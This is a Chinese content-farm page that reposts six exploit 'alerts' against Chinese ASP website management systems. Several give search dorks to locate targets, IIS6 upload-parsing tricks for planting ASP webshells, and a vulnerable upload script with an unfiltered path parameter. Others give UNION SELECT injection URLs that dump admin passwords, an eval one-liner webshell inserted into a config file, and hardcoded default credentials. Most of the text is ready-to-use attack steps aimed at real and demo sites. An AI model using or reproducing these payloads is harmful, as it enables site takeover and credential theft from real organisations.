心海学校心理管理系统Xday漏洞预警

时间:2022-08-24 07:39:43 其他范文 收藏本文 下载本文

心海学校心理管理系统Xday漏洞预警(共6篇)由网友“cicadakiller”投稿提供,以下是小编整理过的心海学校心理管理系统Xday漏洞预警,欢迎阅读分享,希望对大家有帮助。

心海学校心理管理系统Xday漏洞预警

篇1:心海学校心理管理系统Xday漏洞预警

心海学校心理管理系统

漏洞类型:上传漏洞(IIS解析漏洞)

关键词 :1.inurl:zytest/main.asp?id=

2.心理 inurl:article/print.asp?id=

漏洞描述:由于IIS6.0存在解析漏洞,所以本漏洞利用方式工作于windows 系统平台IIS6.0下的

漏洞利用:inc/upload.asp?fl=1.asp;1  上传jpg格式的asp木马,得到shell upload/1.asp;1.jpg

篇2:网趣网站管理系统上传漏洞漏洞预警

程序:网趣网站管理系统1.2.1 (包含动态版和静态版 均存在此漏洞)

下载:www.codepub.com/d/downpage.php?n=1&id=18716::1288173021

FROM:www.st999.cn/blog

DATA:/04/22

利用方法:/ku_edit/ComquUp.asp?nf=&ni=a&nr=ok&nt=../st999.asp;&nm=&nq=&lx=1

漏洞文件:Free_ComQuKu_editComquUp.asp

源码 :

<%Response.Buffer=True

Server.ScriptTimeOut=9999999

On Error Resume Next%>

酷航文件上传系统V2

<%

response.Cookies(“ComquUp”)=“1”

'您可以把上面判断cookies的写入语句复制到您登录的地方,这样便是“只有登录后才能操作上传文件,”

if request.Cookies(“ComquUp”)=“1” then%>

<%

ComquDFormName=trim(request(“nf”))

ComquDInputName=trim(request(“ni”))

ComquDYNReName=trim(request(“nr”))

ComquDPath=trim(request(“nt”))

ComquDDM=trim(request(“nm”))

ComquDPathQ=trim(request(“nq”))

ComquDType=trim(request(“lx”))

if ComquDPath“” then:ComquSavePath=ComquDPath:else:ComquSavePath=“/Upfile/edit/”:end if

if ComquDPathQ“” then:ComquSavePathQ=ComquDPathQ:else:ComquSavePathQ=ComquSavePath:end if

ComquYNPath(ComquSavePath)

if ComquDType=“1” then

ComquFileNames=“jpg,gif,png,bmp”

ComquBigSize=1024000'单位B

elseif ComquDType=“2” then

ComquFileNames=“swf,flv”

ComquBigSize=10240000

elseif ComquDType=“3” then

ComquFileNames=“avi,wmv,asf,mov,mp3,wma”

ComquBigSize=102400000

elseif ComquDType=“4” then

ComquFileNames=“rm,ra,ram,rmvb”

ComquBigSize=102400000

elseif ComquDType=“5” then

ComquFileNames=“txt,rar,zip,doc,7z,ppt”

ComquBigSize=102400000

end if

ComquFileSize=Request.TotalBytes

If ComquFileSize>0 Then

if ComquFileSize

Set ComquUpStm=Server.CreateObject(“ADODB.Stream”)

ComquUpStm.Type=1

ComquUpStm.Open

ComquUpStm.Write Request.BinaryRead(ComquFileSize)

ComquUpStm.Position=0

ComquFormDataSize=ComquUpStm.Read

ComquCrlf=chrB(13)&chrB(10)

ComquFormStart=InStrB(ComquFormDataSize,ComquCrlf)

ComquFormEnd=InStrB(ComquFormStart+1,ComquFormDataSize,ComquCrlf)

Set ComquFormStm=Server.Createobject(“ADODB.Stream”)

ComquFormStm.Type=1

ComquFormStm.Open

ComquUpStm.Position=ComquFormStart + 1

ComquUpStm.CopyTo ComquFormStm,ComquFormEnd-ComquFormStart-3

ComquFormStm.Position=0

ComquFormStm.Type=2

ComquFormStm.CharSet=“GB2312”

ComquFormStmText=ComquFormStm.Readtext

ComquFormStm.Close

ComquUpFileNAll=Mid(ComquFormStmText,InstrRev(ComquFormStmText,“”)+1,ComquFormEnd)

ComquUpFileCZM=mid(ComquUpFileNAll,InstrRev(ComquUpFileNAll,“.”))

If ComquCheckFileCZM(ComquUpFileNAll) Then

if ComquDDM“” then

ComquUpFileName=ComquDDM

else

if ComquDYNReName“ok” then:ComquUpFileName=ComquUpFileNAll:else:ComquUpFileName=Year(now)&right(“0”&Month(now),2)&right(“0”&Day(now),2)&right(“0”&Hour(now),2)&right(“0”&Minute(now),2)&right(“0”&Second(now),2)&right(replace(Request.ServerVariables(“REMOTE_ADDR”),“.”,“”),4)&ComquUpFileCZM:end if

end if

ComquSaveFile=Server.MapPath(ComquSavePath & ComquUpFileName)

k=Instrb(ComquFormDataSize,ComquCrlf&ComquCrlf)+4

l=Instrb(k+1,ComquFormDataSize,leftB(ComquFormDataSize,ComquFormStart-1))-k-2

ComquFormStm.Type=1

ComquFormStm.Open

ComquUpStm.Position=k-1

ComquUpStm.CopyTo ComquFormStm,l

ComquFormStm.SaveToFile ComquSaveFile,2

ComquSaveFileName=Mid(ComquSaveFile,InstrRev(ComquSaveFile,“”)+1)

if ComquDFormName“” then:Response.write“”:else:Response.write“”:end if

Response.write“”&left(ComquSaveFileName,3)&“**”&ComquUpFileCZM&“ 上传成功! 重新上传

Else

Response.write“文件格式不正确! 重新上传文 件

End If

Set ComquFormStm=Nothing

UploadStream.Close

Set UploadStream=Nothing

Function ComquCheckFileCZM(FileName)

FileType=Split(ComquFileNames,“,”)

For i=0 To Ubound(FileType)

If LCase(Right(FileName,len(FileType(i))))=LCase(FileType(i)) then

ComquCheckFileCZM=True

Exit Function

Else

ComquCheckFileCZM=False

End if

Next

End Function

Function ComquYNPath(FolderName)

ComquFolderM=Server.Mappath(FolderName)

Set Fso=CreateObject(“Scripting.FileSystemObject”)

If Not Fso.FolderExists(ComquFolderM) Then

Fso.CreateFolder(ComquFolderM)

End If

Set Fso=Nothing

End Function

else

Response.Write“大小超过”&ComquBigSize&“B! 重新上传

end if

Else%>

<%End if

else:response.Write(“您无权上传操作!”):end if%>

嘿嘿,,,很明显的nt参数未过滤,可以构造路径,直接上传获得shell,

此程序的官方演示地址,也存在着这漏洞。

main.comqu.com/ku_edit/ComquUp.asp?nf=&ni=a&nr=ok&nt=../st999.asp;&nm=&nq=&lx=1

直接找个jpg的马儿上传,右键查看源码,获得名称../st999.asp;st999.asp;0429371540.jpg,实际上马儿的名称是st999.asp;201104220019371540.jpg,shell地址就是upload/2011/4/201104221740280470.jpg

这个是一句话,密码是st999,大家就不要轮J官方的演示站了,嘿嘿。。。

篇3:CGSAIL网站管理系统 0day漏洞预警

<%

dim sql

dim rs

sql = “select * from [”&CgsailPrefix&“admin] where id=”&request(“id”)

Set rs = Server.CreateObject(“ADODB.RecordSet”)

rs.Open sql,conn,1,1

photo=trim(rs(“photo”))

%>

localhost/user_view.asp?id=1%20and%201=1

篇4:星光传媒管理系统通杀漏洞漏洞预警

############################################################################

#

# Title: 星光传媒管理系统通杀漏洞

# Time:-10-30

# Team:makebugs

# Author: 缘分

############################################################################

t.qq.com/MakeBug

hi.baidu.com/micropoor

'虽然漏洞由于粗心造成,但足以通杀整套系统

'由于国际问题,代码就不贴了,

星光传媒管理系统通杀漏洞漏洞预警

'后台添加账户没有验证权限,导致直接添加账户

127.0.0.1/manageadmin/System/manage_admin.asp

127.0.0.1/manageadmin/System/manage_admin_add.asp

其他信息:

127.0.0.1/manageadmin/editor/admin/login.asp

sUsername = “xgnic”

sPassword = “xgnic1281”

这套系统我会继续分析。因为它比较有趣。明明是验证了权限问题,可是能跨域。代码实在太多。以后继续贴码补贴。

篇5:shypostShyPost企业网站管理系统 若干漏洞漏洞预警

ShyPost企业管理系统拥有十几种模板,用户可自由选择,不同模板后台管理功能是一样的,以下 为其中一个模板的前后台测试,欢迎用户测试,

后台演示: www.shypost.com/demo/admin

测试帐号: admin 密码 admin

前台演示: www.shypost.com/demo

销售价格:350元/套

1、注入:

union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin

拿shell:

网站配置中插入:“%><%eval request(”a“)%><%s=”

连接 yoursite.com/inc/config.asp

2、写马:

留言本写入一句话,连接www.badguest.cn/databases/databases.asp

3、其它若干问题

篇6:智睿学校网站管理系统 V1.5.8 注入漏洞漏洞预警

漏洞文件:UserAdd.asp

UserAdd.asp?Result=Modify&ID=158 and 1=2 union select 1,2,3,4,adminname,password,7,8,9,10,11,12,13,14,15,16 from zhi_rui_s_manage

测试结果:

获得管理用户和密码

有道Chrome浏览器划词插件xss漏洞漏洞预警

dedecms 补出来的一个鸡肋漏洞漏洞预警

帝国CMS 留言本多字节漏洞漏洞预警

Wp暴目录漏洞全版本通杀漏洞预警

隔离网络高级威胁攻击预警的分析报告

星光贴吧1.3 后台拿SHELL及修复方案漏洞预警

FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警

一个防注入的小白错误千博企业程序漏洞预警

Discuz x1.5盗取任意用户cookie漏洞预警

玩一场webshell游戏漏洞预警

心海学校心理管理系统Xday漏洞预警
《心海学校心理管理系统Xday漏洞预警.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【心海学校心理管理系统Xday漏洞预警(共6篇)】相关文章:

Bambook某频道SQL注射漏洞及修复2022-08-31

防汛、防台风应急救援预案2023-01-26

opera9.52使用ajax读取本地文件漏洞进一步利用漏洞预警2023-04-03

国内CMS现状――带着垃圾站思想的CMS2023-01-03

Linux操作系统中的防火墙技术及其应用2023-10-12

LNK文件漏洞简要分析2023-01-25

防范交通安全作文2022-06-18

问题的讨论和解决英语考试要求与试题2023-06-07

马的作文一年级篇2023-01-29

CMSZERO企业网站管理系统功能介绍2022-12-02

点击下载本文文档